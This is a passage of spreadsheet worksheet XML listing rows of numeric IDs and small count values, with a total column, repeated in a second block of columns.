      <c r="K1496" s="7">
        <v>5647</v>
      </c>
      <c r="L1496" s="8">
        <v>6</v>
      </c>
      <c r="M1496" s="8">
        <v>1</v>
      </c>
      <c r="N1496" s="8">
        <v>0</v>
      </c>
      <c r="O1496" s="8">
        <v>1</v>
      </c>
      <c r="P1496" s="8">
        <v>0</v>
      </c>
      <c r="Q1496" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1497" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1497" s="7">
        <v>5649</v>
      </c>
      <c r="B1497" s="8">
        <v>6</v>
      </c>
      <c r="C1497" s="8">
        <v>0</v>
      </c>
      <c r="D1497" s="8">
        <v>6</v>
      </c>
      <c r="E1497" s="8">
        <v>2</v>
      </c>
      <c r="F1497" s="8">
        <v>2</v>
      </c>
      <c r="G1497" s="8">
        <v>1</v>
      </c>
      <c r="H1497" s="8">
        <v>17</v>
      </c>
      <c r="K1497" s="7">
        <v>5649</v>
      </c>
      <c r="L1497" s="8">
        <v>6</v>
      </c>
      <c r="M1497" s="8">
        <v>0</v>
      </c>
      <c r="N1497" s="8">
        <v>6</v>
      </c>
      <c r="O1497" s="8">
        <v>2</v>
      </c>
      <c r="P1497" s="8">
        <v>2</v>
      </c>
      <c r="Q1497" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1498" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1498" s="7">
        <v>5650</v>
      </c>
      <c r="B1498" s="8">
        <v>26</v>
      </c>
      <c r="C1498" s="8">
        <v>0</v>
      </c>
      <c r="D1498" s="8">
        <v>0</v>
      </c>
      <c r="E1498" s="8">
        <v>0</v>
      </c>
      <c r="F1498" s="8">
        <v>5</v>
      </c>
      <c r="G1498" s="8">
        <v>0</v>
      </c>
      <c r="H1498" s="8">
        <v>31</v>
      </c>
      <c r="K1498" s="7">
        <v>5650</v>
      </c>
      <c r="L1498" s="8">
        <v>26</v>
      </c>
      <c r="M1498" s="8">
        <v>0</v>
      </c>
      <c r="N1498" s="8">
        <v>0</v>
      </c>
      <c r="O1498" s="8">
        <v>0</v>
      </c>
      <c r="P1498" s="8">
        <v>5</v>
      </c>
      <c r="Q1498" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1499" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1499" s="7">
        <v>5651</v>
      </c>
      <c r="B1499" s="8">
        <v>6</v>
      </c>
      <c r="C1499" s="8">
        <v>1</v>
      </c>
      <c r="D1499" s="8">
        <v>4</v>
      </c>
      <c r="E1499" s="8">
        <v>10</v>
      </c>
      <c r="F1499" s="8">
        <v>1</v>
      </c>
      <c r="G1499" s="8">
        <v>2</v>
      </c>
      <c r="H1499" s="8">
        <v>24</v>
      </c>
      <c r="K1499" s="7">
        <v>5651</v>
      </c>
      <c r="L1499" s="8">
        <v>6</v>
      </c>
      <c r="M1499" s="8">
        <v>1</v>
      </c>
      <c r="N1499" s="8">
        <v>4</v>
      </c>
      <c r="O1499" s="8">
        <v>10</v>
      </c>
      <c r="P1499" s="8">
        <v>1</v>
      </c>
      <c r="Q1499" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1500" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1500" s="7">
        <v>5652</v>
      </c>
      <c r="B1500" s="8">
        <v>47</v>
      </c>
      <c r="C1500" s="8">
        <v>1</v>
      </c>
      <c r="D1500" s="8">
        <v>0</v>
      </c>
      <c r="E1500" s="8">
        <v>2</v>
      </c>
      <c r="F1500" s="8">
        <v>32</v>
      </c>
      <c r="G1500" s="8">
        <v>3</v>
      </c>
      <c r="H1500" s="8">
        <v>85</v>
      </c>
      <c r="K1500" s="7">
        <v>5652</v>
      </c>
      <c r="L1500" s="8">
        <v>47</v>
      </c>
      <c r="M1500" s="8">
        <v>1</v>
      </c>
      <c r="N1500" s="8">
        <v>0</v>
      </c>
      <c r="O1500" s="8">
        <v>2</v>
      </c>
      <c r="P1500" s="8">
        <v>32</v>
      </c>
      <c r="Q1500" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1501" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1501" s="7">
        <v>5657</v>
      </c>
      <c r="B1501" s="8">
        <v>5</v>
      </c>
      <c r="C1501" s="8">
        <v>2</v>
      </c>
      <c r="D1501" s="8">
        <v>0</v>
      </c>
      <c r="E1501" s="8">
        <v>0</v>
      </c>
      <c r="F1501" s="8">
        <v>2</v>
      </c>
      <c r="G1501" s="8">
        <v>6</v>
      </c>
      <c r="H1501" s="8">
        <v>15</v>
      </c>
      <c r="K1501" s="7">
        <v>5657</v>
      </c>
      <c r="L1501" s="8">
        <v>5</v>
      </c>
      <c r="M1501" s="8">
        <v>2</v>
      </c>
      <c r="N1501" s="8">
        <v>0</v>
      </c>
      <c r="O1501" s="8">
        <v>0</v>
      </c>
      <c r="P1501" s="8">
        <v>2</v>
      </c>
      <c r="Q1501" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1502" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1502" s="7">
        <v>5660</v>
      </c>
      <c r="B1502" s="8">
        <v>20</v>
      </c>
      <c r="C1502" s="8">
        <v>1</v>
      </c>
      <c r="D1502" s="8">
        <v>0</v>
      </c>
      <c r="E1502" s="8">
        <v>0</v>
      </c>
      <c r="F1502" s="8">
        <v>1</v>
      </c>
      <c r="G1502" s="8">
        <v>8</v>
      </c>
      <c r="H1502" s="8">
        <v>30</v>
      </c>
      <c r="K1502" s="7">
        <v>5660</v>
      </c>
      <c r="L1502" s="8">
        <v>20</v>
      </c>
      <c r="M1502" s="8">
        <v>1</v>
      </c>
      <c r="N1502" s="8">
        <v>0</v>
      </c>
      <c r="O1502" s="8">
        <v>0</v>
      </c>
      <c r="P1502" s="8">
        <v>1</v>
      </c>
      <c r="Q1502" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1503" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1503" s="7">
        <v>5665</v>
      </c>
      <c r="B1503" s="8">
        <v>0</v>
      </c>
      <c r="C1503" s="8">
        <v>0</v>
      </c>
      <c r="D1503" s="8">
        <v>7</v>
      </c>
      <c r="E1503" s="8">
        <v>3</v>
      </c>
      <c r="F1503" s="8">
        <v>5</v>
      </c>
      <c r="G1503" s="8">
        <v>1</v>
      </c>
      <c r="H1503" s="8">
        <v>16</v>
      </c>
      <c r="K1503" s="7">
        <v>5665</v>
      </c>
      <c r="L1503" s="8">
        <v>0</v>
      </c>
      <c r="M1503" s="8">
        <v>0</v>
      </c>
      <c r="N1503" s="8">
        <v>7</v>
      </c>
      <c r="O1503" s="8">
        <v>3</v>
      </c>
      <c r="P1503" s="8">
        <v>5</v>
      </c>
      <c r="Q1503" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1504" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1504" s="7">
        <v>5667</v>
      </c>
      <c r="B1504" s="8">
        <v>0</v>
      </c>
      <c r="C1504" s="8">
        <v>0</v>
      </c>
      <c r="D1504" s="8">
        <v>22</v>
      </c>
      <c r="E1504" s="8">
        <v>5</v>
      </c>
      <c r="F1504" s="8">
        <v>3</v>
      </c>
      <c r="G1504" s="8">
        <v>1</v>
      </c>
      <c r="H1504" s="8">
        <v>31</v>
      </c>
      <c r="K1504" s="7">
        <v>5667</v>
      </c>
      <c r="L1504" s="8">
        <v>0</v>
      </c>
      <c r="M1504" s="8">
        <v>0</v>
      </c>
      <c r="N1504" s="8">
        <v>22</v>
      </c>
      <c r="O1504" s="8">
        <v>5</v>
      </c>
      <c r="P1504" s="8">
        <v>3</v>
      </c>
      <c r="Q1504" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1505" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1505" s="7">
        <v>5669</v>
      </c>
      <c r="B1505" s="8">
        <v>22</v>
      </c>
      <c r="C1505" s="8">
        <v>2</v>
      </c>
      <c r="D1505" s="8">
        <v>10</v>
      </c>
      <c r="E1505" s="8">
        <v>5</v>
      </c>
      <c r="F1505" s="8">
        <v>2</v>
      </c>
      <c r="G1505" s="8">
        <v>3</v>
      </c>
      <c r="H1505" s="8">
        <v>44</v>
      </c>
      <c r="K1505" s="7">
        <v>5669</v>
      </c>
      <c r="L1505" s="8">
        <v>22</v>
      </c>
      <c r="M1505" s="8">
        <v>2</v>
      </c>
      <c r="N1505" s="8">
        <v>10</v>
      </c>
      <c r="O1505" s="8">
        <v>5</v>
      </c>
      <c r="P1505" s="8">
        <v>2</v>
      </c>
      <c r="Q1505" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1506" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1506" s="7">
        <v>5670</v>
      </c>
      <c r="B1506" s="8">
        <v>31</v>
      </c>
      <c r="C1506" s="8">
        <v>1</v>
      </c>
      <c r="D1506" s="8">
        <v>10</v>
      </c>
      <c r="E1506" s="8">
        <v>56</v>
      </c>
      <c r="F1506" s="8">
        <v>7</v>
      </c>
      <c r="G1506" s="8">
        <v>7</v>
      </c>
      <c r="H1506" s="8">
        <v>112</v>
      </c>
      <c r="K1506" s="7">
        <v>5670</v>
      </c>
      <c r="L1506" s="8">
        <v>31</v>
      </c>
      <c r="M1506" s="8">
        <v>1</v>
      </c>
      <c r="N1506" s="8">
        <v>10</v>
      </c>
      <c r="O1506" s="8">
        <v>56</v>
      </c>
      <c r="P1506" s="8">
        <v>7</v>
      </c>
      <c r="Q1506" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1507" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1507" s="7">
        <v>5671</v>
      </c>
      <c r="B1507" s="8">
        <v>26</v>
      </c>
      <c r="C1507" s="8">
        <v>0</v>
      </c>
      <c r="D1507" s="8">
        <v>10</v>
      </c>
      <c r="E1507" s="8">
        <v>2</v>
      </c>
      <c r="F1507" s="8">
        <v>2</v>
      </c>
      <c r="G1507" s="8">
        <v>3</v>
      </c>
      <c r="H1507" s="8">
        <v>43</v>
      </c>
      <c r="K1507" s="7">
        <v>5671</v>
      </c>
      <c r="L1507" s="8">
        <v>26</v>
      </c>
      <c r="M1507" s="8">
        <v>0</v>
      </c>
      <c r="N1507" s="8">
        <v>10</v>
      </c>
      <c r="O1507" s="8">
        <v>2</v>
      </c>
      <c r="P1507" s="8">
        <v>2</v>
      </c>
      <c r="Q1507" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1508" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1508" s="7">
        <v>5672</v>
      </c>
      <c r="B1508" s="8">
        <v>24</v>
      </c>
      <c r="C1508" s="8">
        <v>1</v>
      </c>
      <c r="D1508" s="8">
        <v>72</v>
      </c>
      <c r="E1508" s="8">
        <v>156</v>
      </c>
      <c r="F1508" s="8">
        <v>4</v>
      </c>
      <c r="G1508" s="8">
        <v>2</v>
      </c>
      <c r="H1508" s="8">
        <v>259</v>
      </c>
      <c r="K1508" s="7">
        <v>5672</v>
      </c>
      <c r="L1508" s="8">
        <v>24</v>
      </c>
      <c r="M1508" s="8">
        <v>1</v>
      </c>
      <c r="N1508" s="8">
        <v>72</v>
      </c>
      <c r="O1508" s="8">
        <v>156</v>
      </c>
      <c r="P1508" s="8">
        <v>4</v>
      </c>
      <c r="Q1508" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1509" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1509" s="7">
        <v>5673</v>
      </c>
      <c r="B1509" s="8">
        <v>10</v>
      </c>
      <c r="C1509" s="8">
        <v>0</v>
      </c>
      <c r="D1509" s="8">
        <v>0</v>
      </c>
      <c r="E1509" s="8">
        <v>0</v>
      </c>
      <c r="F1509" s="8">
        <v>3</v>
      </c>
      <c r="G1509" s="8">
        <v>2</v>
      </c>
      <c r="H1509" s="8">
        <v>15</v>
      </c>
      <c r="K1509" s="7">
        <v>5673</v>
      </c>
      <c r="L1509" s="8">
        <v>10</v>
      </c>
      <c r="M1509" s="8">
        <v>0</v>
      </c>
      <c r="N1509" s="8">
        <v>0</v>
      </c>
      <c r="O1509" s="8">
        <v>0</v>
      </c>
      <c r="P1509" s="8">
        <v>3</v>
      </c>
      <c r="Q1509" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1510" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1510" s="7">
        <v>5674</v>
      </c>
      <c r="B1510" s="8">
        <v>24</v>
      </c>
      <c r="C1510" s="8">
        <v>0</v>
      </c>
      <c r="D1510" s="8">
        <v>0</v>
      </c>
      <c r="E1510" s="8">
        <v>0</v>
      </c>
      <c r="F1510" s="8">
        <v>1</v>
      </c>
      <c r="G1510" s="8">
        <v>1</v>
      </c>
      <c r="H1510" s="8">
        <v>26</v>
      </c>
      <c r="K1510" s="7">
        <v>5674</v>
      </c>
      <c r="L1510" s="8">
        <v>24</v>
      </c>
      <c r="M1510" s="8">
        <v>0</v>
      </c>
      <c r="N1510" s="8">
        <v>0</v>
      </c>
      <c r="O1510" s="8">
        <v>0</v>
      </c>
      <c r="P1510" s="8">
        <v>1</v>
      </c>
      <c r="Q1510" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1511" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1511" s="7">
        <v>5676</v>
      </c>
      <c r="B1511" s="8">
        <v>20</v>
      </c>
      <c r="C1511" s="8">
        <v>0</v>
      </c>
      <c r="D1511" s="8">
        <v>0</v>
      </c>
      <c r="E1511" s="8">
        <v>0</v>
      </c>
      <c r="F1511" s="8">
        <v>1</v>
      </c>
      <c r="G1511" s="8">
        <v>2</v>
      </c>
      <c r="H1511" s="8">
        <v>23</v>
      </c>
      <c r="K1511" s="7">
        <v>5676</v>
      </c>
      <c r="L1511" s="8">
        <v>20</v>
      </c>
      <c r="M1511" s="8">
        <v>0</v>
      </c>
      <c r="N1511" s="8">
        <v>0</v>
      </c>
      <c r="O1511" s="8">
        <v>0</v>
      </c>
      <c r="P1511" s="8">
        <v>1</v>
      </c>
      <c r="Q1511" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1512" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1512" s="7">
        <v>5678</v>
      </c>
      <c r="B1512" s="8">
        <v>24</v>
      </c>
      <c r="C1512" s="8">
        <v>0</v>
      </c>
      <c r="D1512" s="8">
        <v>0</v>
      </c>
      <c r="E1512" s="8">
        <v>0</v>
      </c>
      <c r="F1512" s="8">
        <v>1</v>
      </c>
      <c r="G1512" s="8">
        <v>4</v>
      </c>
      <c r="H1512" s="8">
        <v>29</v>
      </c>
      <c r="K1512" s="7">
        <v>5678</v>
      </c>
      <c r="L1512" s="8">
        <v>24</v>
      </c>
      <c r="M1512" s="8">
        <v>0</v>
      </c>
      <c r="N1512" s="8">
        <v>0</v>
      </c>
      <c r="O1512" s="8">
        <v>0</v>
      </c>
      <c r="P1512" s="8">
        <v>1</v>
      </c>
      <c r="Q1512" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1513" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1513" s="7">
        <v>5679</v>
      </c>
      <c r="B1513" s="8">
        <v>20</v>
      </c>
      <c r="C1513" s="8">
        <v>0</v>
      </c>
      <c r="D1513" s="8">
        <v>0</v>
      </c>
      <c r="E1513" s="8">
        <v>0</v>
      </c>
      <c r="F1513" s="8">
        <v>5</v>
      </c>
      <c r="G1513" s="8">
        <v>2</v>
      </c>
      <c r="H1513" s="8">
        <v>27</v>
      </c>
      <c r="K1513" s="7">
        <v>5679</v>
      </c>
      <c r="L1513" s="8">
        <v>20</v>
      </c>
      <c r="M1513" s="8">
        <v>0</v>
      </c>
      <c r="N1513" s="8">
        <v>0</v>
      </c>
      <c r="O1513" s="8">
        <v>0</v>
      </c>
      <c r="P1513" s="8">
        <v>5</v>
      </c>
      <c r="Q1513" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1514" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1514" s="7">
        <v>5680</v>
      </c>
      <c r="B1514" s="8">
        <v>16</v>
      </c>
      <c r="C1514" s="8">
        <v>1</v>
      </c>
      <c r="D1514" s="8">
        <v>0</v>
      </c>
      <c r="E1514" s="8">
        <v>0</v>
      </c>
      <c r="F1514" s="8">
        <v>10</v>
      </c>
      <c r="G1514" s="8">
        <v>2</v>
      </c>
      <c r="H1514" s="8">
        <v>29</v>
      </c>
      <c r="K1514" s="7">
        <v>5680</v>
      </c>
      <c r="L1514" s="8">
        <v>16</v>
      </c>
      <c r="M1514" s="8">
        <v>1</v>
      </c>
      <c r="N1514" s="8">
        <v>0</v>
      </c>
      <c r="O1514" s="8">
        <v>0</v>
      </c>
      <c r="P1514" s="8">
        <v>10</v>
      </c>
      <c r="Q1514" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1515" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1515" s="7">
        <v>5681</v>
      </c>
      <c r="B1515" s="8">
        <v>0</v>
      </c>
      <c r="C1515" s="8">
        <v>0</v>
      </c>
      <c r="D1515" s="8">
        <v>2</v>
      </c>
      <c r="E1515" s="8">
        <v>0</v>
      </c>
      <c r="F1515" s="8">
        <v>3</v>
      </c>
      <c r="G1515" s="8">
        <v>2</v>
      </c>
      <c r="H1515" s="8">
        <v>7</v>
      </c>
      <c r="K1515" s="7">
        <v>5681</v>
      </c>
      <c r="L1515" s="8">
        <v>0</v>
      </c>
      <c r="M1515" s="8">
        <v>0</v>
      </c>
      <c r="N1515" s="8">
        <v>2</v>
      </c>
      <c r="O1515" s="8">
        <v>0</v>
      </c>
      <c r="P1515" s="8">
        <v>3</v>
      </c>
      <c r="Q1515" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1516" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1516" s="7">
        <v>5684</v>
      </c>
      <c r="B1516" s="8">
        <v>20</v>
      </c>
      <c r="C1516" s="8">
        <v>1</v>
      </c>
      <c r="D1516" s="8">
        <v>3</v>
      </c>
      <c r="E1516" s="8">
        <v>1</v>
      </c>
      <c r="F1516" s="8">
        <v>3</v>
      </c>
      <c r="G1516" s="8">
        <v>0</v>
      </c>
      <c r="H1516" s="8">
        <v>28</v>
      </c>
      <c r="K1516" s="7">
        <v>5684</v>
      </c>
      <c r="L1516" s="8">
        <v>20</v>
      </c>
      <c r="M1516" s="8">
        <v>1</v>
      </c>
      <c r="N1516" s="8">
        <v>3</v>
      </c>
      <c r="O1516" s="8">
        <v>1</v>
      </c>
      <c r="P1516" s="8">
        <v>3</v>
      </c>
      <c r="Q1516" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1517" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1517" s="7">
        <v>5686</v>
      </c>
      <c r="B1517" s="8">
        <v>0</v>
      </c>
      <c r="C1517" s="8">
        <v>0</v>
      </c>
      <c r="D1517" s="8">
        <v>3</v>
      </c>
      <c r="E1517" s="8">
        <v>0</v>
      </c>
      <c r="F1517" s="8">
        <v>13</v>
      </c>
      <c r="G1517" s="8">
        <v>2</v>
      </c>
      <c r="H1517" s="8">
        <v>18</v>
      </c>
      <c r="K1517" s="7">
        <v>5686</v>
      </c>
      <c r="L1517" s="8">
        <v>0</v>
      </c>
      <c r="M1517" s="8">
        <v>0</v>
      </c>
      <c r="N1517" s="8">
        <v>3</v>
      </c>
      <c r="O1517" s="8">
        <v>0</v>
      </c>
      <c r="P1517" s="8">
        <v>13</v>
      </c>
      <c r="Q1517" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1518" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1518" s="7">
        <v>5687</v>
      </c>
      <c r="B1518" s="8">
        <v>0</v>
      </c>
      <c r="C1518" s="8">
        <v>0</v>
      </c>
      <c r="D1518" s="8">
        <v>0</v>
      </c>
      <c r="E1518" s="8">
        <v>0</v>
      </c>
      <c r="F1518" s="8">
        <v>4</v>
      </c>
      <c r="G1518" s="8">
        <v>1</v>
      </c>
      <c r="H1518" s="8">
        <v>5</v>
      </c>
      <c r="K1518" s="7">
        <v>5687</v>
      </c>
      <c r="L1518" s="8">
        <v>0</v>
      </c>
      <c r="M1518" s="8">
        <v>0</v>
      </c>
      <c r="N1518" s="8">
        <v>0</v>
      </c>
      <c r="O1518" s="8">
        <v>0</v>
      </c>
      <c r="P1518" s="8">
        <v>4</v>
      </c>
      <c r="Q1518" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1519" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1519" s="7">
        <v>5688</v>
      </c>
      <c r="B1519" s="8">
        <v>24</v>
      </c>
      <c r="C1519" s="8">
        <v>0</v>
      </c>
      <c r="D1519" s="8">
        <v>0</v>
      </c>
      <c r="E1519" s="8">
        <v>0</v>
      </c>
      <c r="F1519" s="8">
        <v>1</v>
      </c>
      <c r="G1519" s="8">
        <v>4</v>
      </c>
      <c r="H1519" s="8">
        <v>29</v>
      </c>
      <c r="K1519" s="7">
        <v>5688</v>
      </c>
      <c r="L1519" s="8">
        <v>24</v>
      </c>
      <c r="M1519" s="8">
        <v>0</v>
      </c>
      <c r="N1519" s="8">
        <v>0</v>
      </c>
      <c r="O1519" s="8">
        <v>0</v>
      </c>
      <c r="P1519" s="8">
        <v>1</v>
      </c>
      <c r="Q1519" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1520" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1520" s="7">
        <v>5690</v>
      </c>
      <c r="B1520" s="8">
        <v>30</v>
      </c>
      <c r="C1520" s="8">
        <v>2</v>
      </c>
      <c r="D1520" s="8">
        <v>0</v>
      </c>
      <c r="E1520" s="8">
        <v>0</v>
      </c>
      <c r="F1520" s="8">
        <v>7</v>
      </c>
      <c r="G1520" s="8">
        <v>1</v>
      </c>
      <c r="H1520" s="8">
        <v>40</v>
      </c>
      <c r="K1520" s="7">
        <v>5690</v>
      </c>
      <c r="L1520" s="8">
        <v>30</v>
      </c>
      <c r="M1520" s="8">
        <v>2</v>
      </c>
      <c r="N1520" s="8">
        <v>0</v>
      </c>
      <c r="O1520" s="8">
        <v>0</v>
      </c>
      <c r="P1520" s="8">
        <v>7</v>
      </c>
      <c r="Q1520" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1521" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1521" s="7">
        <v>5693</v>
      </c>
      <c r="B1521" s="8">
        <v>6</v>
      </c>
      <c r="C1521" s="8">
        <v>0</v>
      </c>
      <c r="D1521" s="8">
        <v>8</v>
      </c>
      <c r="E1521" s="8">
        <v>0</v>
      </c>
      <c r="F1521" s="8">
        <v>7</v>
      </c>
      <c r="G1521" s="8">
        <v>5</v>
      </c>
      <c r="H1521" s="8">
        <v>26</v>
      </c>
      <c r="K1521" s="7">
        <v>5693</v>
      </c>
      <c r="L1521" s="8">
        <v>6</v>
      </c>
      <c r="M1521" s="8">
        <v>0</v>
      </c>
      <c r="N1521" s="8">
        <v>8</v>
      </c>
      <c r="O1521" s="8">
        <v>0</v>
      </c>
      <c r="P1521" s="8">
        <v>7</v>
      </c>
      <c r="Q1521" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1522" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1522" s="7">
        <v>5694</v>
      </c>
      <c r="B1522" s="8">
        <v>20</v>
      </c>
      <c r="C1522" s="8">
        <v>0</v>
      </c>
      <c r="D1522" s="8">
        <v>0</v>
      </c>
      <c r="E1522" s="8">
        <v>0</v>
      </c>
      <c r="F1522" s="8">
        <v>0</v>
      </c>
      <c r="G1522" s="8">
        <v>2</v>
      </c>
      <c r="H1522" s="8">
        <v>22</v>
      </c>
      <c r="K1522" s="7">
        <v>5694</v>
      </c>
      <c r="L1522" s="8">
        <v>20</v>
      </c>
      <c r="M1522" s="8">
        <v>0</v>
      </c>
      <c r="N1522" s="8">
        <v>0</v>
      </c>
      <c r="O1522" s="8">
        <v>0</v>
      </c>
      <c r="P1522" s="8">
        <v>0</v>
      </c>
      <c r="Q1522" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1523" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1523" s="7">
        <v>5695</v>
      </c>
      <c r="B1523" s="8">
        <v>30</v>
      </c>
      <c r="C1523" s="8">
        <v>0</v>
      </c>
      <c r="D1523" s="8">
        <v>0</v>
      </c>
      <c r="E1523" s="8">
        <v>3</v>
      </c>
      <c r="F1523" s="8">
        <v>3</v>
      </c>
      <c r="G1523" s="8">
        <v>4</v>
      </c>
      <c r="H1523" s="8">
        <v>40</v>
      </c>
      <c r="K1523" s="7">
        <v>5695</v>
      </c>
      <c r="L1523" s="8">
        <v>30</v>
      </c>
      <c r="M1523" s="8">
        <v>0</v>
      </c>
      <c r="N1523" s="8">
        <v>0</v>
      </c>
      <c r="O1523" s="8">
        <v>3</v>
      </c>
      <c r="P1523" s="8">
        <v>3</v>
      </c>
      <c r="Q1523" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1524" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1524" s="7">
        <v>5697</v>
      </c>
      <c r="B1524" s="8">
        <v>25</v>
      </c>
      <c r="C1524" s="8">
        <v>3</v>
      </c>
      <c r="D1524" s="8">
        <v>5</v>
      </c>
      <c r="E1524" s="8">
        <v>5</v>
      </c>
      <c r="F1524" s="8">
        <v>52</v>
      </c>
      <c r="G1524" s="8">
        <v>79</v>
      </c>
      <c r="H1524" s="8">
        <v>169</v>
      </c>
      <c r="K1524" s="7">
        <v>5697</v>
      </c>
      <c r="L1524" s="8">
        <v>25</v>
      </c>
      <c r="M1524" s="8">
        <v>3</v>
      </c>
      <c r="N1524" s="8">
        <v>5</v>
      </c>
      <c r="O1524" s="8">
        <v>5</v>
      </c>
      <c r="P1524" s="8">
        <v>52</v>
      </c>
      <c r="Q1524" s="8">
        <v>79</v>
      </c>
    </row>
    <row r="1525" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1525" s="7">
        <v>5699</v>
      </c>
      <c r="B1525" s="8">
        <v>25</v>
      </c>
      <c r="C1525" s="8">
        <v>1</v>
      </c>
      <c r="D1525" s="8">
        <v>30</v>
      </c>
      <c r="E1525" s="8">
        <v>20</v>
      </c>
      <c r="F1525" s="8">
        <v>20</v>
      </c>
      <c r="G1525" s="8">
        <v>15</v>
      </c>
      <c r="H1525" s="8">
        <v>111</v>
      </c>
      <c r="K1525" s="7">
        <v>5699</v>
      </c>
      <c r="L1525" s="8">
        <v>25</v>
      </c>
      <c r="M1525" s="8">
        <v>1</v>
      </c>
      <c r="N1525" s="8">
        <v>30</v>
      </c>
      <c r="O1525" s="8">
        <v>20</v>
      </c>
      <c r="P1525" s="8">
        <v>20</v>
      </c>
      <c r="Q1525" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="1526" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1526" s="7">
        <v>5700</v>
      </c>
      <c r="B1526" s="8">
        <v>25</v>
      </c>
      <c r="C1526" s="8">
        <v>1</v>
      </c>
      <c r="D1526" s="8">
        <v>158</v>
      </c>
      <c r="E1526" s="8">
        <v>183</v>
      </c>
      <c r="F1526" s="8">
        <v>7</v>
      </c>
      <c r="G1526" s="8">
        <v>7</v>
      </c>
      <c r="H1526" s="8">
        <v>381</v>
      </c>
      <c r="K1526" s="7">
        <v>5700</v>
      </c>
      <c r="L1526" s="8">
        <v>25</v>
      </c>
      <c r="M1526" s="8">
        <v>1</v>
      </c>
      <c r="N1526" s="8">
        <v>158</v>
      </c>
      <c r="O1526" s="8">
        <v>183</v>
      </c>
      <c r="P1526" s="8">
        <v>7</v>
      </c>
      <c r="Q1526" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1527" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1527" s="7">
        <v>5708</v>
      </c>
      <c r="B1527" s="8">
        <v>30</v>
      </c>
      <c r="C1527" s="8">
        <v>1</v>
      </c>
      <c r="D1527" s="8">
        <v>0</v>
      </c>
      <c r="E1527" s="8">
        <v>0</v>
      </c>
      <c r="F1527" s="8">
        <v>8</v>
      </c>
      <c r="G1527" s="8">
        <v>1</v>
      </c>
      <c r="H1527" s="8">
        <v>40</v>
      </c>
      <c r="K1527" s="7">
        <v>5708</v>
      </c>
      <c r="L1527" s="8">
        <v>30</v>
      </c>
      <c r="M1527" s="8">
        <v>1</v>
      </c>
      <c r="N1527" s="8">
        <v>0</v>
      </c>
      <c r="O1527" s="8">
        <v>0</v>
      </c>
      <c r="P1527" s="8">
        <v>8</v>
      </c>
      <c r="Q1527" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1528" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1528" s="7">
        <v>5709</v>
      </c>
      <c r="B1528" s="8">
        <v>30</v>
      </c>
      <c r="C1528" s="8">
        <v>1</v>
      </c>
      <c r="D1528" s="8">
        <v>0</v>
      </c>
      <c r="E1528" s="8">
        <v>0</v>
      </c>
      <c r="F1528" s="8">
        <v>5</v>
      </c>
      <c r="G1528" s="8">
        <v>1</v>
      </c>
      <c r="H1528" s="8">
        <v>37</v>
      </c>
      <c r="K1528" s="7">
        <v>5709</v>
      </c>
      <c r="L1528" s="8">
        <v>30</v>
      </c>
      <c r="M1528" s="8">
        <v>1</v>
      </c>
      <c r="N1528" s="8">
        <v>0</v>
      </c>
      <c r="O1528" s="8">
        <v>0</v>
      </c>
      <c r="P1528" s="8">
        <v>5</v>
      </c>
      <c r="Q1528" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1529" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1529" s="7">
        <v>5711</v>
      </c>
      <c r="B1529" s="8">
        <v>30</v>
      </c>
      <c r="C1529" s="8">
